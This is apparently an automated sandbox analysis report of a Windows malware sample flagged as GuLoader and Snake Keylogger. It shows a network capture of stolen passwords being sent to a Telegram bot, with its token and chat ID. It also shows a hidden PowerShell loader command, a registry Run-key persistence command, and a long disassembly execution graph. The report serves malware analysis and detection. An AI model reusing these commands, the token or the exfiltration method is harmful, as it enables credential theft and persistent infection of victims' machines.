                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c3F0WZKpvtBl2Up%2FTnO%2BAEna%2BZjuSdokuX1g6Or2OuOkwmhIZt90l5Mo%2FtPYZBFuH1dS0ULj0f38%2FkxgNoiN1OJ0JYjAT4LPTNfCymbKyekLjxkzIjl3VYy8lSKQiEqB7vrZ6XPJ"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a98c29fcb0f4a-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-25 07:57:01 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-25 07:57:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.449753149.154.167.2204437972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-25 07:57:07 UTC350OUTPOST /bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendDocument?chat_id=5811709821&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=------------------------8dcad4b8239f5aa
                                          Host: api.telegram.org
                                          Content-Length: 547
                                          Connection: Keep-Alive
                                          2024-07-25 07:57:07 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 64 34 62 38 32 33 39 66 35 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 31 39 36 33 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 30 37 2f 32 30 32 34 20 2f 20 30 33 3a 35 36 3a 34 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                          Data Ascii: --------------------------8dcad4b8239f5aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:019635Date and Time: 25/07/2024 / 03:56:41Client IP:
                                          2024-07-25 07:57:07 UTC388INHTTP/1.1 200 OK
                                          Server: nginx/1.18.0
                                          Date: Thu, 25 Jul 2024 07:57:07 GMT
                                          Content-Type: application/json
                                          Content-Length: 537
                                          Connection: close
                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          2024-07-25 07:57:07 UTC537INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 33 38 30 32 30 36 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 62 6f 78 6c 67 73 31 30 31 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 61 6b 65 62 6f 78 31 30 30 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 38 31 31 37 30 39 38 32 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 65 34 66 5c 75 64 38 33 63 5c 75 64 66 66 64 24 5c 75 30 30 61 33 5c 75 32 30 61 63 5c 75 30 30 61 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 55 42 4f 5f 30 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c
                                          Data Ascii: {"ok":true,"result":{"message_id":16,"from":{"id":7233802065,"is_bot":true,"first_name":"boxlgs101_bot","username":"snakebox100_bot"},"chat":{"id":5811709821,"first_name":"\ud83d\ude4f\ud83c\udffd$\u00a3\u20ac\u00a5","username":"HUBO_0","type":"private"},


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:03:55:52
                                          Start date:25/07/2024
                                          Path:C:\Users\user\Desktop\Torpernes.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Torpernes.exe"
                                          Imagebase:0x400000
                                          File size:1'283'968 bytes
                                          MD5 hash:ECC4FF0EE7D123F0E90587EA3A7B9AE3
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:1
                                          Start time:03:55:54
                                          Start date:25/07/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"
                                          Imagebase:0xc90000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2181416185.0000000009DFB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:2
                                          Start time:03:55:54
                                          Start date:25/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:03:56:31
                                          Start date:25/07/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\Contentious.exe"
                                          Imagebase:0x400000
                                          File size:1'283'968 bytes
                                          MD5 hash:ECC4FF0EE7D123F0E90587EA3A7B9AE3
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2944378842.0000000021031000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2944378842.0000000020FAA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Antivirus matches:
                                          • Detection: 11%, ReversingLabs
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:7
                                          Start time:03:56:35
                                          Start date:25/07/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
                                          Imagebase:0x240000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:03:56:35
                                          Start date:25/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:9
                                          Start time:03:56:35
                                          Start date:25/07/2024
                                          Path:C:\Windows\SysWOW64\reg.exe
                                          Wow64 process (32bit):true
                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
                                          Imagebase:0xce0000
                                          File size:59'392 bytes
                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:20.1%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:22.5%
                                            Total number of Nodes:1256
                                            Total number of Limit Nodes:36
                                            execution_graph 3691 401d41 GetDC GetDeviceCaps 3692 402b1d 18 API calls 3691->3692 3693 401d5f MulDiv ReleaseDC 3692->3693 3694 402b1d 18 API calls 3693->3694 3695 401d7e 3694->3695 3696 405e3b 18 API calls 3695->3696 3697 401db7 CreateFontIndirectW 3696->3697 3698 4024e8 3697->3698 3699 401a42 3700 402b1d 18 API calls 3699->3700 3701 401a48 3700->3701 3702 402b1d 18 API calls 3701->3702 3703 4019f0 3702->3703 3704 4044c2 3705 4044ee 3704->3705 3706 4044ff 3704->3706 3765 4055d9 GetDlgItemTextW 3705->3765 3708 40450b GetDlgItem 3706->3708 3709 40456a 3706->3709 3711 40451f 3708->3711 3716 405e3b 18 API calls 3709->3716 3726 40464e 3709->3726 3763 4047fc 3709->3763 3710 4044f9 3712 4060ad 5 API calls 3710->3712 3714 404533 SetWindowTextW 3711->3714 3715 40590f 4 API calls 3711->3715 3712->3706 3718 404027 19 API calls 3714->3718 3721 404529 3715->3721 3722 4045de SHBrowseForFolderW 3716->3722 3717 40467e 3723 40596c 18 API calls 3717->3723 3724 40454f 3718->3724 3719 40408e 8 API calls 3720 404810 3719->3720 3721->3714 3729 405864 3 API calls 3721->3729 3725 4045f6 CoTaskMemFree 3722->3725 3722->3726 3727 404684 3723->3727 3728 404027 19 API calls 3724->3728 3730 405864 3 API calls 3725->3730 3726->3763 3767 4055d9 GetDlgItemTextW 3726->3767 3768 405e19 lstrcpynW 3727->3768 3731 40455d 3728->3731 3729->3714 3732 404603 3730->3732 3766 40405c SendMessageW 3731->3766 3735 40463a SetDlgItemTextW 3732->3735 3740 405e3b 18 API calls 3732->3740 3735->3726 3736 404563 3738 406183 3 API calls 3736->3738 3737 40469b 3739 406183 3 API calls 3737->3739 3738->3709 3746 4046a3 3739->3746 3741 404622 lstrcmpiW 3740->3741 3741->3735 3744 404633 lstrcatW 3741->3744 3742 4046e2 3769 405e19 lstrcpynW 3742->3769 3744->3735 3745 4046eb 3747 40590f 4 API calls 3745->3747 3746->3742 3750 4058b0 2 API calls 3746->3750 3752 40473a 3746->3752 3748 4046f1 GetDiskFreeSpaceW 3747->3748 3751 404713 MulDiv 3748->3751 3748->3752 3750->3746 3751->3752 3753 4047ab 3752->3753 3770 404946 3752->3770 3754 4047ce 3753->3754 3756 40140b 2 API calls 3753->3756 3781 404049 KiUserCallbackDispatcher 3754->3781 3756->3754 3759 4047ad SetDlgItemTextW 3759->3753 3760 40479d 3773 40487d 3760->3773 3761 4047ea 3761->3763 3782 404457 3761->3782 3763->3719 3765->3710 3766->3736 3767->3717 3768->3737 3769->3745 3771 40487d 21 API calls 3770->3771 3772 404798 3771->3772 3772->3759 3772->3760 3775 404896 3773->3775 3774 405e3b 18 API calls 3776 4048fa 3774->3776 3775->3774 3777 405e3b 18 API calls 3776->3777 3778 404905 3777->3778 3779 405e3b 18 API calls 3778->3779 3780 40491b lstrlenW wsprintfW SetDlgItemTextW 3779->3780 3780->3753 3781->3761 3783 404465 3782->3783 3784 40446a SendMessageW 3782->3784 3783->3784 3784->3763 3785 4041c4 3786 4041dc 3785->3786 3789 4042f6 3785->3789 3790 404027 19 API calls 3786->3790 3787 404360 3788 40436a GetDlgItem 3787->3788 3791 404432 3787->3791 3792 4043f3 3788->3792 3793 404384 3788->3793 3789->3787 3789->3791 3794 404331 GetDlgItem SendMessageW 3789->3794 3795 404243 3790->3795 3796 40408e 8 API calls 3791->3796 3792->3791 3797 404405 3792->3797 3793->3792 3801 4043aa 6 API calls 3793->3801 3816 404049 KiUserCallbackDispatcher 3794->3816 3799 404027 19 API calls 3795->3799 3800 40442d 3796->3800 3802 40441b 3797->3802 3803 40440b SendMessageW 3797->3803 3805 404250 CheckDlgButton 3799->3805 3801->3792 3802->3800 3806 404421 SendMessageW 3802->3806 3803->3802 3804 40435b 3807 404457 SendMessageW 3804->3807 3814 404049 KiUserCallbackDispatcher 3805->3814 3806->3800 3807->3787 3809 40426e GetDlgItem 3815 40405c SendMessageW 3809->3815 3811 404284 SendMessageW 3812 4042a1 GetSysColor 3811->3812 3813 4042aa SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3811->3813 3812->3813 3813->3800 3814->3809 3815->3811 3816->3804 3817 402746 3818 402741 3817->3818 3818->3817 3819 402756 FindNextFileW 3818->3819 3820 4027a8 3819->3820 3822 402761 3819->3822 3823 405e19 lstrcpynW 3820->3823 3823->3822 3824 401cc6 3825 402b1d 18 API calls 3824->3825 3826 401cd9 SetWindowLongW 3825->3826 3827 4029c7 3826->3827 3206 401dc7 3214 402b1d 3206->3214 3208 401dcd 3209 402b1d 18 API calls 3208->3209 3210 401dd6 3209->3210 3211 401de8 EnableWindow 3210->3211 3212 401ddd ShowWindow 3210->3212 3213 4029c7 3211->3213 3212->3213 3215 405e3b 18 API calls 3214->3215 3216 402b31 3215->3216 3216->3208 3828 401bca 3829 402b1d 18 API calls 3828->3829 3830 401bd1 3829->3830 3831 402b1d 18 API calls 3830->3831 3832 401bdb 3831->3832 3833 401beb 3832->3833 3834 402b3a 18 API calls 3832->3834 3835 401bfb 3833->3835 3838 402b3a 18 API calls 3833->3838 3834->3833 3836 401c06 3835->3836 3837 401c4a 3835->3837 3839 402b1d 18 API calls 3836->3839 3840 402b3a 18 API calls 3837->3840 3838->3835 3841 401c0b 3839->3841 3842 401c4f 3840->3842 3843 402b1d 18 API calls 3841->3843 3844 402b3a 18 API calls 3842->3844 3845 401c14 3843->3845 3846 401c58 FindWindowExW 3844->3846 3847 401c3a SendMessageW 3845->3847 3848 401c1c SendMessageTimeoutW 3845->3848 3849 401c7a 3846->3849 3847->3849 3848->3849 3217 4014cb 3218 4050c1 25 API calls 3217->3218 3219 4014d2 3218->3219 3850 40194b 3851 402b1d 18 API calls 3850->3851 3852 401952 3851->3852 3853 402b1d 18 API calls 3852->3853 3854 40195c 3853->3854 3855 402b3a 18 API calls 3854->3855 3856 401965 3855->3856 3857 401979 lstrlenW 3856->3857 3862 4019b5 3856->3862 3858 401983 3857->3858 3858->3862 3863 405e19 lstrcpynW 3858->3863 3860 40199e 3861 4019ab lstrlenW 3860->3861 3860->3862 3861->3862 3863->3860 3864 4024cc 3865 402b3a 18 API calls 3864->3865 3866 4024d3 3865->3866 3869 405a85 GetFileAttributesW CreateFileW 3866->3869 3868 4024df 3869->3868 3220 403b4f 3221 403ca2 3220->3221 3222 403b67 3220->3222 3224 403cf3 3221->3224 3225 403cb3 GetDlgItem GetDlgItem 3221->3225 3222->3221 3223 403b73 3222->3223 3226 403b91 3223->3226 3227 403b7e SetWindowPos 3223->3227 3229 403d4d 3224->3229 3237 401389 2 API calls 3224->3237 3228 404027 19 API calls 3225->3228 3230 403b96 ShowWindow 3226->3230 3231 403bae 3226->3231 3227->3226 3232 403cdd KiUserCallbackDispatcher 3228->3232 3233 404073 SendMessageW 3229->3233 3250 403c9d 3229->3250 3230->3231 3234 403bd0 3231->3234 3235 403bb6 DestroyWindow 3231->3235 3290 40140b 3232->3290 3247 403d5f 3233->3247 3238 403bd5 SetWindowLongW 3234->3238 3239 403be6 3234->3239 3289 403fb0 3235->3289 3240 403d25 3237->3240 3238->3250 3243 403bf2 GetDlgItem 3239->3243 3244 403c8f 3239->3244 3240->3229 3245 403d29 SendMessageW 3240->3245 3241 40140b 2 API calls 3241->3247 3242 403fb2 DestroyWindow EndDialog 3242->3289 3248 403c05 SendMessageW IsWindowEnabled 3243->3248 3253 403c22 3243->3253 3249 40408e 8 API calls 3244->3249 3245->3250 3246 403fe1 ShowWindow 3246->3250 3247->3241 3247->3242 3247->3250 3251 405e3b 18 API calls 3247->3251 3258 404027 19 API calls 3247->3258 3265 404027 19 API calls 3247->3265 3280 403ef2 DestroyWindow 3247->3280 3248->3250 3248->3253 3249->3250 3251->3247 3252 403c27 3257 404000 SendMessageW 3252->3257 3253->3252 3254 403c2f 3253->3254 3255 403c42 3253->3255 3256 403c76 SendMessageW 3253->3256 3254->3252 3254->3256 3259 403c4a 3255->3259 3260 403c5f 3255->3260 3256->3244 3261 403c5d 3257->3261 3258->3247 3262 40140b 2 API calls 3259->3262 3263 40140b 2 API calls 3260->3263 3261->3244 3262->3252 3264 403c66 3263->3264 3264->3244 3264->3252 3266 403dda GetDlgItem 3265->3266 3267 403df7 ShowWindow KiUserCallbackDispatcher 3266->3267 3268 403def 3266->3268 3293 404049 KiUserCallbackDispatcher 3267->3293 3268->3267 3270 403e21 EnableWindow 3273 403e35 3270->3273 3271 403e3a GetSystemMenu EnableMenuItem SendMessageW 3272 403e6a SendMessageW 3271->3272 3271->3273 3272->3273 3273->3271 3294 40405c SendMessageW 3273->3294 3295 405e19 lstrcpynW 3273->3295 3276 403e98 lstrlenW 3277 405e3b 18 API calls 3276->3277 3278 403eae SetWindowTextW 3277->3278 3279 401389 2 API calls 3278->3279 3279->3247 3281 403f0c CreateDialogParamW 3280->3281 3280->3289 3282 403f3f 3281->3282 3281->3289 3283 404027 19 API calls 3282->3283 3284 403f4a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3283->3284 3285 401389 2 API calls 3284->3285 3286 403f90 3285->3286 3286->3250 3287 403f98 ShowWindow 3286->3287 3288 404073 SendMessageW 3287->3288 3288->3289 3289->3246 3289->3250 3291 401389 2 API calls 3290->3291 3292 401420 3291->3292 3292->3224 3293->3270 3294->3273 3295->3276 3870 4019cf 3871 402b3a 18 API calls 3870->3871 3872 4019d6 3871->3872 3873 402b3a 18 API calls 3872->3873 3874 4019df 3873->3874 3875 4019e6 lstrcmpiW 3874->3875 3876 4019f8 lstrcmpW 3874->3876 3877 4019ec 3875->3877 3876->3877 3296 401e51 3297 402b3a 18 API calls 3296->3297 3298 401e57 3297->3298 3299 4050c1 25 API calls 3298->3299 3300 401e61 3299->3300 3314 405590 CreateProcessW 3300->3314 3303 402793 3304 401ec6 CloseHandle 3304->3303 3305 401e77 WaitForSingleObject 3306 401e89 3305->3306 3307 401e9b GetExitCodeProcess 3306->3307 3317 4061bc 3306->3317 3308 401eba 3307->3308 3309 401ead 3307->3309 3308->3304 3313 401eb8 3308->3313 3321 405d60 wsprintfW 3309->3321 3313->3304 3315 4055c3 CloseHandle 3314->3315 3316 401e67 3314->3316 3315->3316 3316->3303 3316->3304 3316->3305 3318 4061d9 PeekMessageW 3317->3318 3319 401e90 WaitForSingleObject 3318->3319 3320 4061cf DispatchMessageW 3318->3320 3319->3306 3320->3318 3321->3313 3372 401752 3373 402b3a 18 API calls 3372->3373 3374 401759 3373->3374 3375 401781 3374->3375 3376 401779 3374->3376 3412 405e19 lstrcpynW 3375->3412 3411 405e19 lstrcpynW 3376->3411 3379 40177f 3383 4060ad 5 API calls 3379->3383 3380 40178c 3381 405864 3 API calls 3380->3381 3382 401792 lstrcatW 3381->3382 3382->3379 3389 40179e 3383->3389 3384 40615c 2 API calls 3384->3389 3385 405a60 2 API calls 3385->3389 3387 4017b0 CompareFileTime 3387->3389 3388 401870 3390 4050c1 25 API calls 3388->3390 3389->3384 3389->3385 3389->3387 3389->3388 3392 405e19 lstrcpynW 3389->3392 3399 405e3b 18 API calls 3389->3399 3408 401847 3389->3408 3410 405a85 GetFileAttributesW CreateFileW 3389->3410 3413 4055f5 3389->3413 3393 40187a 3390->3393 3391 4050c1 25 API calls 3394 40185c 3391->3394 3392->3389 3395 402fa2 37 API calls 3393->3395 3396 40188d 3395->3396 3397 4018a1 SetFileTime 3396->3397 3398 4018b3 FindCloseChangeNotification 3396->3398 3397->3398 3398->3394 3400 4018c4 3398->3400 3399->3389 3401 4018c9 3400->3401 3402 4018dc 3400->3402 3403 405e3b 18 API calls 3401->3403 3404 405e3b 18 API calls 3402->3404 3405 4018d1 lstrcatW 3403->3405 3406 4018e4 3404->3406 3405->3406 3409 4055f5 MessageBoxIndirectW 3406->3409 3408->3391 3408->3394 3409->3394 3410->3389 3411->3379 3412->3380 3414 40560a 3413->3414 3415 405656 3414->3415 3416 40561e MessageBoxIndirectW 3414->3416 3415->3389 3416->3415 3885 402253 3886 402261 3885->3886 3887 40225b 3885->3887 3889 40226f 3886->3889 3890 402b3a 18 API calls 3886->3890 3888 402b3a 18 API calls 3887->3888 3888->3886 3891 40227d 3889->3891 3893 402b3a 18 API calls 3889->3893 3890->3889 3892 402b3a 18 API calls 3891->3892 3894 402286 WritePrivateProfileStringW 3892->3894 3893->3891 3895 402454 3896 402c44 19 API calls 3895->3896 3897 40245e 3896->3897 3898 402b1d 18 API calls 3897->3898 3899 402467 3898->3899 3900 40248b RegEnumValueW 3899->3900 3901 40247f RegEnumKeyW 3899->3901 3903 402793 3899->3903 3902 4024a4 RegCloseKey 3900->3902 3900->3903 3901->3902 3902->3903 3905 401ed4 3906 402b3a 18 API calls 3905->3906 3907 401edb 3906->3907 3908 40615c 2 API calls 3907->3908 3909 401ee1 3908->3909 3911 401ef2 3909->3911 3912 405d60 wsprintfW 3909->3912 3912->3911 3417 4022d5 3418 402305 3417->3418 3419 4022da 3417->3419 3421 402b3a 18 API calls 3418->3421 3420 402c44 19 API calls 3419->3420 3423 4022e1 3420->3423 3422 40230c 3421->3422 3430 402b7a RegOpenKeyExW 3422->3430 3424 4022eb 3423->3424 3428 402324 3423->3428 3425 402b3a 18 API calls 3424->3425 3427 4022f2 RegDeleteValueW RegCloseKey 3425->3427 3427->3428 3437 402ba5 3430->3437 3439 402322 3430->3439 3431 402bcb RegEnumKeyW 3432 402bdd RegCloseKey 3431->3432 3431->3437 3433 406183 3 API calls 3432->3433 3435 402bed 3433->3435 3434 402c02 RegCloseKey 3434->3439 3438 402c1d RegDeleteKeyW 3435->3438 3435->3439 3436 402b7a 3 API calls 3436->3437 3437->3431 3437->3432 3437->3434 3437->3436 3438->3439 3439->3428 3913 4014d7 3914 402b1d 18 API calls 3913->3914 3915 4014dd Sleep 3914->3915 3917 4029c7 3915->3917 3918 40155b 3919 40296d 3918->3919 3922 405d60 wsprintfW 3919->3922 3921 402972 3922->3921 2919 4023e0 2930 402c44 2919->2930 2921 4023ea 2934 402b3a 2921->2934 2924 4023fe RegQueryValueExW 2925 402424 RegCloseKey 2924->2925 2926 40241e 2924->2926 2927 402793 2925->2927 2926->2925 2940 405d60 wsprintfW 2926->2940 2931 402b3a 18 API calls 2930->2931 2932 402c5d 2931->2932 2933 402c6b RegOpenKeyExW 2932->2933 2933->2921 2935 402b46 2934->2935 2941 405e3b 2935->2941 2938 4023f3 2938->2924 2938->2927 2940->2925 2957 405e48 2941->2957 2942 406093 2943 402b67 2942->2943 2975 405e19 lstrcpynW 2942->2975 2943->2938 2959 4060ad 2943->2959 2945 405efb GetVersion 2945->2957 2946 406061 lstrlenW 2946->2957 2949 405e3b 10 API calls 2949->2946 2951 405f76 GetSystemDirectoryW 2951->2957 2952 405f89 GetWindowsDirectoryW 2952->2957 2953 4060ad 5 API calls 2953->2957 2954 405fbd SHGetSpecialFolderLocation 2954->2957 2958 405fd5 SHGetPathFromIDListW CoTaskMemFree 2954->2958 2955 405e3b 10 API calls 2955->2957 2956 406002 lstrcatW 2956->2957 2957->2942 2957->2945 2957->2946 2957->2949 2957->2951 2957->2952 2957->2953 2957->2954 2957->2955 2957->2956 2968 405ce6 RegOpenKeyExW 2957->2968 2973 405d60 wsprintfW 2957->2973 2974 405e19 lstrcpynW 2957->2974 2958->2957 2966 4060ba 2959->2966 2960 406130 2961 406135 CharPrevW 2960->2961 2963 406156 2960->2963 2961->2960 2962 406123 CharNextW 2962->2960 2962->2966 2963->2938 2965 40610f CharNextW 2965->2966 2966->2960 2966->2962 2966->2965 2967 40611e CharNextW 2966->2967 2976 405891 2966->2976 2967->2962 2969 405d5a 2968->2969 2970 405d1a RegQueryValueExW 2968->2970 2969->2957 2971 405d3b RegCloseKey 2970->2971 2971->2969 2973->2957 2974->2957 2975->2943 2977 405897 2976->2977 2978 4058ad 2977->2978 2979 40589e CharNextW 2977->2979 2978->2966 2979->2977 3930 401ce5 GetDlgItem GetClientRect 3931 402b3a 18 API calls 3930->3931 3932 401d17 LoadImageW SendMessageW 3931->3932 3933 401d35 DeleteObject 3932->3933 3934 4029c7 3932->3934 3933->3934 3935 40206a 3936 402b3a 18 API calls 3935->3936 3937 402071 3936->3937 3938 402b3a 18 API calls 3937->3938 3939 40207b 3938->3939 3940 402b3a 18 API calls 3939->3940 3941 402084 3940->3941 3942 402b3a 18 API calls 3941->3942 3943 40208e 3942->3943 3944 402b3a 18 API calls 3943->3944 3945 402098 3944->3945 3946 4020ac CoCreateInstance 3945->3946 3947 402b3a 18 API calls 3945->3947 3950 4020cb 3946->3950 3947->3946 3948 401423 25 API calls 3949 402197 3948->3949 3950->3948 3950->3949 3951 40376a 3952 403775 3951->3952 3953 40377c GlobalAlloc 3952->3953 3954 403779 3952->3954 3953->3954 3955 40156b 3956 401584 3955->3956 3957 40157b ShowWindow 3955->3957 3958 401592 ShowWindow 3956->3958 3959 4029c7 3956->3959 3957->3956 3958->3959 3960 40646e 3961 4062f2 3960->3961 3962 406c5d 3961->3962 3963 406373 GlobalFree 3961->3963 3964 40637c GlobalAlloc 3961->3964 3965 4063f3 GlobalAlloc 3961->3965 3966 4063ea GlobalFree 3961->3966 3963->3964 3964->3961 3964->3962 3965->3961 3965->3962 3966->3965 3967 4024ee 3968 4024f3 3967->3968 3969 40250c 3967->3969 3970 402b1d 18 API calls 3968->3970 3971 402512 3969->3971 3972 40253e 3969->3972 